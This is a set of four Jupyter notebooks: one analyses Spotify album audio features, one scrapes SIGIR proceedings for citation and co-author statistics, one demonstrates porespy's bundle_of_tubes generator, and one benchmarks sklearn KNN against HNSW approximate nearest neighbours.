# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import requests
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
# %matplotlib inline
import seaborn as sns
import dotenv
import numpy as np
import os
os.getcwd()
os.chdir('C:\\Users\\dwagn\\Desktop')
dotenv.load_dotenv()
CLIENT_ID = os.getenv('spotify-client-id')
CLIENT_SECRET = os.getenv('spotify-client-secret')
os.chdir('C:\\Users\\dwagn\\git\\projects')
# +
AUTH_URL = 'https://accounts.spotify.com/api/token'
auth_response = requests.post(AUTH_URL, {
'grant_type': 'client_credentials',
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
})
auth_response_data = auth_response.json()
access_token = auth_response_data['access_token']
if auth_response.status_code == 200:
print ('Success!')
else:
print ('API access rejected')
headers = {'Authorization': 'Bearer {}'.format(access_token)}
url = 'https://api.spotify.com/v1/'
# +
# # Track ID from the URI
# track_id = '3mfJT8Ae3pME7OmluGNMYF'
# r = requests.get(url + 'audio-features/' + track_id, headers=headers)
# r = r.json()
# r
# +
# Paste artist's share link to get the artist_id
# 'https://open.spotify.com/artist/6py4uFIC7T6RdrZnH6hFYJ?si=EJXirCwjR-2y8iw8oBwYjQ'
while True:
artist_share_url = input('Paste artist spotify share link: ')
if artist_share_url == '':
print('bypassing')
artist_id = ''
break
try:
artist_id = artist_share_url.split('/')[4].split('?')[0]
int(len(artist_id)) > 0
break
except:
print('invalid URL')
print(artist_id)
# +
# artist_id = '6py4uFIC7T6RdrZnH6hFYJ' # Ballyhoo!
artist_id = '41Q0HrwWBtuUkJc7C1Rp6K' # 311
# pull albums
albums = requests.get(url + 'artists/' + artist_id + '/albums',
headers=headers,
params={'include_groups': 'album', 'limit': 50}).json()
# -
album_names_dates = {}
for album in albums['items']:
album_names_dates[album['name']] = album['release_date']
artist_name = requests.get(url + 'artists/' + artist_id, headers=headers).json()['name']
print('Successfully accessed {}'.format(artist_name))
# +
# checks for duplicate albums
# sometimes there are different track names (etc. censored or not) on each album
albs_added = []
to_remove = []
for i in range(len(albums['items'])):
alb_name = albums['items'][i]['name']
if alb_name in albs_added:
to_remove.append(i)
albs_added.append(alb_name)
to_remove
# +
# %%time
track_info = []
repeat_detection = []
iter = 0
for i in albums['items']:
if iter not in to_remove:
r = requests.get(url + 'albums/' + i['id'] + '/tracks',
headers=headers)
tracks = r.json()['items']
for track in tracks:
detailsr = requests.get(url + 'audio-features/' + track['id'], headers=headers).json()
# combine with album info
detailsr.update({
'track_name': track['name'],
'album_name': i['name'],
'album_id': i['id'],
'release_date': i['release_date']
})
track_info.append(detailsr)
print('{} added...'.format(i['name']))
iter += 1
# -
df = pd.DataFrame(track_info)
df.release_date = pd.to_datetime(df.release_date)
df.head()
# +
# double-check for duplicate track values
for name in df.album_name.unique():
track_counts = df[df['album_name'] == name]['track_name'].value_counts()
if all(v == 1 for v in track_counts) == False:
print(f'Warning: duplicates in: {name}')
# +
df['release_date'] = pd.to_datetime(df['release_date'])
# move last couple columns to the front
cols = df.columns.tolist()
cols = cols[-4:] + cols[:-4]
df = df[cols]
# -
# Shorten long album names for graphing
for name in df['album_name']:
if len(name) > 25:
short_name = name[0:25]
df = df.replace(name, short_name)
# +
# remove tracks with na values, if any
# can't simply dropna(), since there is an error column of NAs >:(
def removeErrors(dataframe):
na_tracks = []
for track in dataframe[~dataframe['error'].isna()]['track_name']:
na_tracks.append(track)
print('Removing: ', na_tracks)
dataframe = dataframe[dataframe['error'].isna()].drop('error', 1)
if ('error' in df.columns):
removeErrors(df)
# +
df['duration_mins'] = (df['duration_ms']/60000).round(2)
def toMinsSecs(time):
minutes = int(time)
seconds = int((time - minutes) * 60)
if seconds < 10:
seconds = str(seconds).zfill(2) # adds zeros before single seconds
full = '{}:{}'.format(minutes, seconds)
return full
df['duration_full'] = df['duration_mins'].map(lambda x: toMinsSecs(x))
df.head(5)
# +
# subset by album
by_album = df.groupby('album_name').agg({'danceability':'mean',
'energy':'mean',
'loudness':'mean',
'speechiness':'mean',
'acousticness':'mean',
'instrumentalness':'mean',
'liveness':'mean',
'valence':'mean',
'tempo':'mean',
'time_signature':'mean',
'duration_ms':'sum',
'duration_mins':'sum'}) \
.round(3) \
.reset_index() \
by_album.rename({'time_signature' : 'average_time_signature'})
# +
# remove extra/repeated albums
# for repeat albums, go through and pick shortest album
albs_to_keep = {}
for name in by_album['album_name']:
trim_name = name.split('(')[0].strip()
alb_len = len(df[df['album_name'] == '{}'.format(name)])
print(trim_name,':',alb_len)
for i in albs_to_keep.keys():
if (name[0:5] in i) & (alb_len <= albs_to_keep[i]):
albs_to_keep[i] = 0
albs_to_keep[name] = alb_len
albs_to_keep = {x:y for x,y in albs_to_keep.items() if y != 0}
by_album = by_album[by_album['album_name'].isin(albs_to_keep)].reset_index(drop=True)
# -
plt.figure(figsize=(10,10))
ax = sns.barplot(data=by_album,
x='album_name',
y='duration_mins',
order = by_album.sort_values('duration_mins').album_name)
plt.xlabel("Album", size=15)
plt.ylabel("Duration in Minutes", size=15)
plt.title("Album Lengths for {artist}".format(artist = artist_name), size=18)
ax.set_xticklabels(ax.get_xticklabels(),rotation = 30)
# +
dates = df.release_date.unique()
names = df.album_name.unique()
levels = np.tile([-5, 5, -3, 3, -1, 1],
int(np.ceil(len(dates)/6)))[:len(dates)]
fig, ax = plt.subplots(figsize=(20, 8), constrained_layout=True)
ax.set(title='Album Release Dates')
ax.vlines(dates, 0, levels, color='tab:red')
ax.plot(dates, np.zeros_like(dates), '-o',
color='k', markerfacecolor='w')
for d, l, r in zip(dates, levels, names):
ax.annotate(r, xy=(d, l),
xytext=(-3, np.sign(l)*3), textcoords="offset points",
horizontalalignment="right",
verticalalignment="bottom" if l > 0 else "top")
ax.xaxis.set_major_locator(mdates.MonthLocator(interval=12)) # by year
ax.xaxis.set_major_formatter(mdates.DateFormatter("%Y"))
plt.setp(ax.get_xticklabels(), rotation=45, ha="right"); # semicolon stopping label output
ax.margins(y=0.1, x=0.1)
ax.get_yaxis().set_visible(False)
plt.show()
# -
corr_mat = by_album.corr(method='pearson').round(2)
sorted_mat = corr_mat.unstack().sort_values() \
[:-(len(by_album.columns))-1] \
[::2]
sorted_mat = sorted_mat.sort_values(ascending=False)
top_5_corr = sorted_mat.head(5)
bottom_5_corr = sorted_mat.tail(5)
print('Top 5 positive correlations:\n{}\n\nTop 5 negative correlations:\n{}' \
.format(top_5_corr, bottom_5_corr))
# +
# messy attributes
def graphTopCorrs(signum, idx11, idx12, idx21, idx22, pallette='Set1'):
var1 = str(signum[idx11:idx12]).split()[0]
var2 = str(signum[idx21:idx22]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
marker='o',
hue='album_name',
palette=pallette)
sns.set_style("ticks")
plt.xlabel(var1, size=15)
plt.ylabel(var2, size=15)
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# -
graphTopCorrs(top_5_corr, 0,1,0,1)
graphTopCorrs(bottom_5_corr, 0,1,0,1)
# +
# The largest negative correlation for this artist
var1 = str(bottom_5_corr[0:1]).split()[0]
var2 = str(bottom_5_corr[0:1]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
marker='o',
hue='album_name',
palette='Set1')
sns.set_style("ticks")
plt.xlabel(var1, size=15)
plt.ylabel(var2, size=15)
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# +
# The largest positive correlation for this artist
# import warnings
warnings.filterwarnings("ignore")
var1 = str(top_5_corr[0:1]).split()[0]
var2 = str(top_5_corr[0:1]).split()[1]
plt.figure(figsize=(10, 10))
plt.title("{var1} vs. {var2} for {artist} (by album)".format(var1 = var1,
var2 = var2,
artist = artist_name), size=18)
plt.tight_layout()
ax = sns.scatterplot(data=by_album,
x=var1,
y=var2,
s=1000,
hue='album_name',
palette='Set1')
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title='Albums')
# +
plt.figure(figsize=(10,10))
ax = sns.scatterplot(data=by_album,
x='loudness', y='energy',
hue='album_name',
palette='Set1',
# size='duration_ms',
s=1000,
sizes=(50,1000),
alpha=0.7)
# plt.xlabel("Average Song Energy", size=15)
# plt.ylabel("Average Song Tempo", size=15)
# plt.title("Album Energy and Tempo for {artist}".format(artist = 'None'), size=18)
plt.tight_layout()
# display legend without `size` attribute
h,labs = ax.get_legend_handles_labels()
ax.legend(h[1:len(album_names_dates)+1],
labs[1:int(len(album_names_dates))+1], loc='best', title=None)
| spotify_proj/.ipynb_checkpoints/spotify-checkpoint.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Scripts for Extracting and Proccessing the SIGIR data
# +
import time
import os.path
from requests import get # to make GET request
def download(url, file_name):
# open in binary mode
headers={
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
}
with open(file_name, "wb") as f:
# get request
response = get(url,headers=headers)
# write to file
f.write(response.content)
def make_sp_name(spid):
return "data/sigir-{0}.html".format(spid)
def get_paper_id(paper_url):
i = paper_url.find('=')
j = paper_url.find('&',i)
pid = paper_url[i+1:j]
return pid
# -
# ## Download all the SIGIR proceedings HTML pages from ACM
# +
# These are all the ids to SIGIR proceeings 1971 - 2017
spids40 = ['800096','511706','636669','511285','511754','636713','511793','636805','253495','253168',
'42005','62437','96749','75334','122860','133160','160688','188490','215206','243199','258525','290941'
,'564376','383952','345508','312624','290941','860435','1008992','1076034','1148170','1277741','1390334',
'1571941','1835449','2009916','2348283','2484028','2600428','2766462','2911451','3077136']
spids = spids40
spfiles = []
# Only downloads pages that are not already/previously downloaded
for spid in spids:
sigir_url = "http://dl.acm.org/citation.cfm?id={0}&preflayout=flat".format(spid)
sigir_head_file = make_sp_name(spid)
spfiles.append(sigir_head_file)
print(sigir_head_file)
if not os.path.isfile(sigir_head_file):
print("downloading " + sigir_head_file)
download(sigir_url, sigir_head_file)
time.sleep(1)
# -
# ## Functions for extracting different pieces of data from the SIGIR pages
# +
import re
def extract_url(line):
i = line.find('citation.cfm')
j = line.find('"',i+1)
url = line[i:j]
return url
def remove_non_article_links(line, spid):
r = ['flat','tabs','prox']
r.append(spid)
for w in r:
if line.find(w)>0:
line = ""
return line
def strip_cfs(line):
i = line.find("&CFID")
sline = line[0:i+1]
return sline
def parse_out_papers(file_name,spid):
papers = []
with open(file_name, "r") as f:
line = f.readline()
while line:
if "citation" in line:
line = remove_non_article_links(line,spid)
line = strip_cfs(line)
url = extract_url(line)
if url:
papers.append('http://dl.acm.org/{0}{1}'.format(url,'&preflayout=flat'))
line = f.readline()
return papers
def extract_author_id(line):
i = line.find('author_page.cfm')
j = line.find('"',i+1)
aid = line[i:j]
return aid
def parse_out_authors(file_name):
authors = []
with open(file_name, "r") as f:
line = f.readline()
while line:
if "author_page" in line:
line = strip_cfs(line)
aid = extract_author_id(line)
if aid:
authors.append(aid)
line = f.readline()
return authors
def parse_out_year(file_name):
year = 0
reyear = re.compile(r'\d\d\d\d Proceeding')
with open(file_name, "r") as f:
line = f.readline()
while line:
if " Proceeding" in line:
d = reyear.search(line)
if d:
year = int(d.group()[0:4])
break
line = f.readline()
return year
# -
# ## Calculate which authors had the greatest span between papers at SIGIR
# +
def max_span(year_list):
#finds the max span between years
max_span = 0
years = (0,0)
if len(year_list) == 1:
return max_span, years
prev_year = year_list[0]
for curr_year in year_list[1:]:
curr_span = curr_year-prev_year
if curr_span > max_span:
max_span = curr_span
years = (prev_year,curr_year)
prev_year = curr_year
return max_span, years
# year author dict
ya = {}
for spf in spfiles:
authors = parse_out_authors(spf)
year = parse_out_year(spf)
ya[year] = authors
#print(year, len(authors))
# author year dict
au = {}
for year in ya:
for author in ya[year]:
if author in au:
yl = au[author]
else:
yl = []
yl.append(year)
au[author] = yl
# Print out the authors where the span is greater than 20 years
for author in au:
(ms,ys) = max_span(au[author])
if ms > 17:
print(author, ms, ys)
# -
print(au["author_page.cfm?id=81100618039"])
# ## Count how many references and how many citations each paper has
def count_references(file_name):
references = 0
citations = 0
year = 0
redate = re.compile(r'\d\d\d\d Article')
do_count = 0 # flag
with open(file_name, "r") as f:
line = f.readline()
while line:
if "REFERENCES" in line:
do_count = 1
if ("CITED BY" in line):
do_count = 2
if ("INDEX TERMS" in line):
do_count = 0
if do_count == 1:
if '"abstract"' in line:
references += 1
if do_count == 2:
a = '"abstract"'
if a in line:
i = line.find(a)
j = line.find(' ',i)
c = line[i+len(a)+1:j+1]
citations = c.strip()
do_count = 0
if " Article" in line:
d = redate.search(line)
if d:
year = d.group()[0:4]
line = f.readline()
if references > 0:
references = references -1
return [year, references, citations]
# An example for paper id 2767723 - where it pulls out the year, and the references, and citations.
count_references('data/2767723.html')
def extract_paper_authors(file_name):
""" extracts out the authors for a given paper.
returns a list of the co-authors
"""
authors = []
apc = 'author_page.cfm'
l = len(apc)
do_count = 0
with open(file_name, "r") as f:
line = f.readline()
while line:
if "Published in:" in line:
break
if "Publication of" in line:
break
if "author_page" in line:
i = line.find(apc)
j = line.find('&',i+1)
aid = line[i+l+4:j]
#print(aid)
if aid:
authors.append(aid)
line = f.readline()
return authors
# +
a = extract_paper_authors('data/564499.html')
print(a)
a = extract_paper_authors('data/42021.html')
print(a)
# -
def make_node_list(authors):
x = []
y = []
for a in authors:
for b in authors:
if a != b:
x.append(a)
y.append(b)
print(x,y)
a = ['1','2','3']
make_node_list(a)
# ## for each proceedings html page, extract out all the papers
counts = []
spc = []
for spid in spids:
sigir_head_file = make_sp_name(spid)
papers = parse_out_papers(sigir_head_file, spid)
# for each paper in the proceedings, download the paper
for p in papers:
pid = get_paper_id(p)
paper_file = 'data/{0}.html'.format(pid)
if not os.path.isfile(paper_file):
download(p, paper_file)
time.sleep(2)
[year, refs,cites] = count_references(paper_file)
counts.append([pid, year, refs, cites])
spc.append(len(papers))
# Save the counts data to file
with open("counts.txt", "w") as f:
for c in counts:
f.write("{0} {1} {2} {3}\n".format(c[0], c[1], c[2], c[3] ))
def compute_closest(mref, mcite, threshold):
counts = []
with open("counts.txt",'r') as f:
line = f.readline()
while line:
(spid, year, refs, cites) = line.split()
cites = int( cites.replace(',','') )
refs = int(refs)
score = ((refs-mref)*(refs-mref)) + ((cites-mcite)*(cites-mcite))
counts.append([spid, int(year), refs, cites, score])
if score < threshold:
print("paper id: {0} year: {1} refs: {2} cites: {3} score: {4}".format( spid, year, refs, cites, score))
print("http://dl.acm.org/citation.cfm?id={0}".format(spid))
line = f.readline()
# ## Closest paper(s) to 40 refs and 40 cites
compute_closest(40,40,10)
#
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
% matplotlib inline
plt.style.use('ggplot')
counts = []
with open("counts.txt",'r') as f:
line = f.readline()
while line:
(spid, year, refs, cites) = line.split()
cites = int( cites.replace(',','') )
refs = int(refs)
counts.append([spid, int(year), refs, cites])
line = f.readline()
df = pd.DataFrame(counts)
m = df.mean()
print(m)
# -
len(counts)
# ## Closes paper(s) to the mean number of refs and mean number of cites
mref = m[2]
mcite = m[3]
print(mref,mcite)
compute_closest(mref,mcite,0.3)
# ## Random plots
#times = pd.DatetimeIndex(df[1])
#grouped = df.groupby(df[1]).mean()
plt.figure(figsize=(25,5))
plt.plot(df[3])
plt.show
df.head()
times = pd.DatetimeIndex(df[1])
grouped = df.groupby(df[1]).mean()
plt.figure(figsize=(25,5))
plt.plot(grouped[3])
plt.xlim([1971,2017])
plt.show
# +
pc = 0
x = []
y = []
counts = {}
solo_counts = {}
solo_papers = {}
for spid in spids:
sigir_head_file = make_sp_name(spid)
papers = parse_out_papers(sigir_head_file, spid)
# for each paper in the proceedings, download the paper
for p in papers:
pid = get_paper_id(p)
paper_file = 'data/{0}.html'.format(pid)
pc +=1
authors = extract_paper_authors(paper_file)
l = len(authors)
if l in counts:
counts[l] += 1
else:
counts[l] = 1
if (len(authors)>1):
for a in authors:
for b in authors:
if a != b:
x.append(a)
y.append(b)
elif (len(authors)==1):
a = authors[0]
if a in solo_counts:
solo_counts[a] += 1
else:
solo_counts[a] = 1
if a in solo_papers:
solo_papers[a].append(pid)
else:
solo_papers[a] = [pid]
#for c in counts:
# print(c, counts[c])
for a in solo_counts:
if solo_counts[a] > 6:
print(a, solo_counts[a])
print(solo_papers[a])
with open("graph.txt", "w") as f:
for i in range(0,len(x)):
f.write("{0} {1}\n".format(x[i], y[i] ))
print(pc)
# +
import networkx as nx
G = nx.Graph()
with open("graph.txt",'r') as f:
line = f.readline()
while line:
(a,b) = line.split()
G.add_edge(a,b)
line = f.readline()
#G.add_edge('81316487451','81100617179')
#G.add_edge('81100617179','81316487451')
#G.add_edge('81316487451','81100113287')
#G.add_edge('81100113287','81316487451')
# -
short = nx.shortest_path_length(G)
for key in short:
a = short[key]
sum = 0
if len(a) > 119:
for b in a:
sum += a[b]
m = float(sum)/float(len(a))
if m < 3.8:
print(key, len(a), sum, m)
<NAME> (3.75)
<NAME> (3.76)
<NAME> (3.77)
<NAME> (3.78)
<NAME> (3.78)
#print(short['81100617179'])
a =short['81100617179'] # <NAME>
a = short['81100625548'] # <NAME>
sum = 0
for b in a:
sum += a[b]
m = float(sum)/float(len(a))
print(m)
# +
#print(short['81100617179'])
# -
len(short)
nx.draw_networkx(G)
import matplotlib.pyplot as plt
plt.draw()
| practice scripts.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # `bundle_of_tubes`
# Create a 3D image of a bundle of tubes, in the form of a rectangular plate with randomly sized holes through it.
import matplotlib.pyplot as plt
import numpy as np
import porespy as ps
import inspect
inspect.signature(ps.generators.bundle_of_tubes)
# ## `spacing`
# Controls how far apart each pore is. Note that this limits the maximum size of each pore since they are prevented from overlapping.
# +
fig, ax = plt.subplots(1, 2, figsize=[8, 4])
np.random.seed(10)
shape = [300, 300]
spacing = 10
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing)
ax[0].imshow(im, origin='lower', interpolation='none')
ax[0].axis(False)
spacing = 15
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing)
ax[1].imshow(im, origin='lower', interpolation='none')
ax[1].axis(False);
# -
# ## `distribution`
# The default size distribution is uniform (i.e. random) with sizes ranging between 3 and ``spacing - 1``. To use a different distribution it can specify using a predefined ``scipy.stats`` object. If care is not taken to ensure the distribution only returns values between 3 and ``spacing - 1`` then the value are clipped accordingly.
# +
import scipy.stats as spst
fig, ax = plt.subplots(1, 2, figsize=[8, 4])
dst = spst.norm(loc=8, scale=1)
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing, distribution=dst)
ax[0].imshow(im, origin='lower', interpolation='none')
ax[0].axis(False)
dst = spst.norm(loc=10, scale=4)
im = ps.generators.bundle_of_tubes(shape=shape, spacing=spacing, distribution=dst)
ax[1].imshow(im, origin='lower', interpolation='none')
ax[1].axis(False);
| examples/generators/reference/bundle_of_tubes.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="8e4nFKI9DzZl"
# # KNN (K-Nearest Neighbors) is Dead!
# [](https://colab.research.google.com/github/stephenleo/adventures-with-ann/blob/main/knn_is_dead.ipynb)
#
# Long live ANNs for their whopping 380X speedup over sklearn's KNN while delivering 99.3% similar results.
#
# 
#
# We're living through an extinction-level event. No, not COVID19, I'm talking about the demise of the popular KNN algorithm that is taught in pretty much every Data Science course! Read on to find out what's replacing this staple in every Data Scientists' toolkit.
#
# # KNN Background
# Finding "K" similar items to any given item is widely known in the machine learning community as a "similarity" search or "nearest neighbor" (NN) search. The most widely known NN search algorithm is the K-Nearest Neighbours (KNN) algorithm. In KNN, given a collection of objects like an e-commerce catalog of handphones, we can find a small number (K) nearest neighbors from this entire catalog for any new search query. For example, in the below example, if you set K = 3, then the 3 nearest neighbors for each "iPhone" is another "iPhone." Similarly, the 3 nearest neighbors to each "Samsung" are all Samsungs.
#
# | Title |
# |----------------------------------------------------|
# | Apple iPhone 12/12 Pro and 12 Pro max |
# | APPLE iPhone 12 2020 256GB SIM Free / Smart Phone |
# | Samsung Galaxy Note20 - Ultra/5G/LTE/4G w Warranty |
# | APPLE IPHONE 12PRO MAX 256GB ONE YEAR WARRANTY |
# | New Release Samsung Note 20 4G / Note 20 Ultra 5G |
# | SAMSUNG GALAXY NOTE 20 ULTRA 5G |
#
# ## Issue with KNN
# While KNN is great at finding similar items, it finds neighbors using an exhaustive pairwise distance computation. If your data contains 1000 items, then to find the K=3 nearest neighbors of a new product, the algorithm needs to perform 1000 distance computations of the new product to all the other products in your database. Well, that's not too bad, yet. But imagine a real-world Customer-to-Customer (C2C) marketplace with millions of products in the database and potentially thousands of new products uploaded every day. Comparing each new product to all the millions of products is wasteful and takes too much time, a.k.a not-scalable <b><i>at all</i></b>.
#
# ## The Solution
# The solution to scale Nearest Neighbors to large data volumes is to sidestep the brute force distance computations completely and instead use a more sophisticated class of algorithms called Approximate Nearest Neighbors (ANN).
# + [markdown] id="Sx0tma05DzZ0"
# # Approximate Nearest Neighbors (ANN)
# Strictly speaking, ANNs are a class of algorithms in which a small number of errors are allowed during the NN search. But in a real-world C2C marketplace where the number of "real" neighbors is higher than the "K" nearest neighbors being searched, ANNs can achieve remarkable accuracy on par with brute-force KNN within a fraction of the time. There are several ANN algorithms such as
# 1. Spotify's [ANNOY](https://github.com/spotify/annoy)
# 2. Google's [ScaNN](https://github.com/google-research/google-research/tree/master/scann)
# 3. Facebook's [Faiss](https://github.com/facebookresearch/faiss)
# 3. And my personal favourite: Hierarchical Navigable Small World graphs [HNSW](https://github.com/nmslib/hnswlib)
#
# The rest of this post benchmarks the KNN algorithm implemented in Python's `sklearn` to the excellent ANN algorithm called Hierarchical Navigable Small World (HNSW) graphs implemented in Python's `hnswlib` package. I'll use a large [Amazon product dataset](http://deepyeti.ucsd.edu/jianmo/amazon/) which contains 527000 products in the 'Cell Phones & Accessories' category to prove that HNSW is far superior in terms of speed (380X faster, to be precise) while delivering 99.3% similar results to sklearn's KNN.
#
# ## Hierarchical Navigable Small World (HNSW)
# In HNSW [[paper @ arxiv]](https://arxiv.org/abs/1603.09320), the authors describe an ANN algorithm using a multi-layer graph. During element insertion, the HNSW graph is built incrementally by randomly selecting each element's maximum layer with an exponentially decaying probability distribution. This ensures that layer=0 has many elements to enable fine-search while layer=2 has $e^{-2}$ lower number of elements to facilitate coarse-search. The nearest neighbor search starts at the topmost layer with a coarse search and proceeds lower until the lowest layer using a greedy graph routing to traverse the graph and find the required number of neighbors.
#
#  and ends in the bottom-most layer (fine search)")
#
# ## HNSW Python package
# The whole HNSW algorithm has been written in C++ with Python bindings that can be pip installed on your machine by typing: `pip install hnswlib`. Once you install the package and import it, creating the HNSW graph requires a few steps that I have wrapped into a convenience function below. Once you have created the HNSW index, querying for "K" nearest neighbors is as simple as calling a single line of code as below.
#
# ```
# ann_neighbor_indices, ann_distances = p.knn_query(features, k)
# ```
# + id="CHcoPI26DzZ4"
# !pip install hnswlib
# + id="gMsW2WL3DzZ6"
import hnswlib
import numpy as np
def fit_hnsw_index(features, ef=100, M=16, save_index_file=False):
# Convenience function to create HNSW graph
# features : list of lists containing the embeddings
# ef, M: parameters to tune the HNSW algorithm
num_elements = len(features)
labels_index = np.arange(num_elements)
EMBEDDING_SIZE = len(features[0])
# Declaring index
# possible space options are l2, cosine or ip
p = hnswlib.Index(space='l2', dim=EMBEDDING_SIZE)
# Initing index - the maximum number of elements should be known
p.init_index(max_elements=num_elements, ef_construction=ef, M=M)
# Element insertion
int_labels = p.add_items(features, labels_index)
# Controlling the recall by setting ef
# ef should always be > k
p.set_ef(ef)
# If you want to save the graph to a file
if save_index_file:
p.save_index(save_index_file)
return p
# + [markdown] id="DbRBRmbaDzZ8"
# # KNN vs. ANN Benchmarking Experiment
# ## Plan
# We'll first download a large dataset with 500K+ rows. Then we'll convert a text column to an `300d` embedding vector by using the pre-trained `fasttext` sentence vector. Then I'll train both KNN and HNSW ANN models on different lengths of the input data `[1000, 10000, 100000, len(data)]` to measure the impact of data size on the speed. Finally, I'll query `K = 10` and `100` nearest neighbors from both models to measure the impact of `K` on the speed. First, let's import the necessary packages and models. This will take some time as the `fasttext` model needs to be downloaded from the internet.
# + id="tePRE3eADzZ-" outputId="9c596816-9a13-42bd-a2ab-ee73878a921d"
# Imports
# For input data pre-processing
import json
import gzip
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import fasttext.util
fasttext.util.download_model('en', if_exists='ignore') # English pre-trained model
ft = fasttext.load_model('cc.en.300.bin')
# For KNN vs ANN benchmarking
from datetime import datetime
from tqdm import tqdm
from sklearn.neighbors import NearestNeighbors
import hnswlib
# + [markdown] id="pif5Pj1tDzaD"
# ## Data
# We'll use the [Amazon product dataset](http://deepyeti.ucsd.edu/jianmo/amazon/), which contains 527000 products in the 'Cell Phones & Accessories' category. Download the dataset from the link and run the below code to convert it to a data frame. We only need the product title column as we will use it to search for similar products.
#
# If everything ran fine, you should see an output as below.
# + id="DrQGcQ_4DzaF"
# Data: http://deepyeti.ucsd.edu/jianmo/amazon/
data = []
with gzip.open('meta_Cell_Phones_and_Accessories.json.gz') as f:
for l in f:
data.append(json.loads(l.strip()))
# + id="vc-dZD_NDzaG" outputId="ed7a7aa6-7527-45db-f9db-9c74960839b7"
# Pre-Processing: https://colab.research.google.com/drive/1Zv6MARGQcrBbLHyjPVVMZVnRWsRnVMpV#scrollTo=LgWrDtZ94w89
# Convert list into pandas dataframe
df = pd.DataFrame.from_dict(data)
df.fillna('', inplace=True)
# Filter unformatted rows
df = df[~df.title.str.contains('getTime')]
# Restrict to just 'Cell Phones and Accessories'
df = df[df['main_cat']=='Cell Phones & Accessories']
# Reset index
df.reset_index(inplace=True, drop=True)
# Only keep the title columns
df = df[['title']]
# Check the df
print(df.shape)
df.head()
# + [markdown] id="paqn0vFODzaH"
# ## Embedding
# To run any similarity search on textual data, we must first convert it to a numeric vector. A fast and convenient approach uses a pre-trained network's embedding layer, such as the one provided by Facebook's [FastText](https://github.com/facebookresearch/fastText). Since we want all the rows to have the same length vector, irrespective of the number of words in the title, we shall apply the `get_sentence_vector` method on the `title` column in df. Once the embedding is completed, we extract the `emb` column as a list of lists to input into our NN algorithms. Ideally, you would run some text cleaning pre-processing before this step. Also, using a fine-tuned embedding model is generally a good idea.
# + id="3p25PPDrDzaI" outputId="77cdc341-641c-40a0-9965-b9047158f1e5"
# Title Embedding using FastText Sentence Embedding
df['emb'] = df['title'].apply(ft.get_sentence_vector)
# Extract out the embeddings column as a list of lists for input to our NN algos
X = [item.tolist() for item in df['emb'].values]
# + [markdown] id="Ln5LE4nRDzaK"
# ## Benchmarking
# Now that we have the input to our algorithms let's run the benchmarking tests. We will run the test as a loop within a loop of the number of products in the search space and `K` nearest neighbors being searched.
#
# At each iteration, in addition to clocking the time taken by each algorithm, we check the `pct_overlap` as the ratio of the number of KNN nearest neighbors that were also picked up as nearest neighbors by the ANN.
#
# <b>Beware!</b> The whole test ran for ~6days on an 8 core, 30 GB RAM machine running 24x7, so this could take some time. Ideally, you could speed it up by multiprocessing since each run is independent of the other.
#
# The output at the end of this run looks as below. As you can already see from the table, the HNSW ANN completely blows away KNN!
# + id="8HCyUaBNDzaL"
# Number of products for benchmark loop
n_products = [1000, 10000, 100000, len(X)]
# Number of neighbors for benchmark loop
n_neighbors = [10, 100]
# Dictionary to save metric results for each iteration
metrics = {'products':[], 'k':[], 'knn_time':[], 'ann_time':[], 'pct_overlap':[]}
for products in tqdm(n_products):
# "products" number of products included in the search space
features = X[:products]
for k in tqdm(n_neighbors):
# "K" Nearest Neighbor search
# KNN
knn_start = datetime.now()
nbrs = NearestNeighbors(n_neighbors=k, metric='euclidean').fit(features)
knn_distances, knn_neighbor_indices = nbrs.kneighbors(features)
knn_end = datetime.now()
metrics['knn_time'].append((knn_end - knn_start).total_seconds())
# HNSW ANN
ann_start = datetime.now()
p = fit_hnsw_index(features, ef=k*10)
ann_neighbor_indices, ann_distances = p.knn_query(features, k)
ann_end = datetime.now()
metrics['ann_time'].append((ann_end - ann_start).total_seconds())
# Average Percent Overlap in Nearest Neighbors across all "products"
pct_overlap_per_product = [len(np.intersect1d(knn_neighbor_indices[i], ann_neighbor_indices[i]))/k for i in range(len(features))]
metrics['pct_overlap'].append(np.mean(pct_overlap_per_product))
metrics['products'].append(products)
metrics['k'].append(k)
metrics_df = pd.DataFrame(metrics)
metrics_df.to_csv('data/metrics_df.csv', index=False)
# + id="6-bMJFGdDzaM" outputId="bc294c73-83ed-4ae6-a49a-4d17f554e025"
metrics_df
# + [markdown] id="drWVgv9ZDzaO"
# ## Results
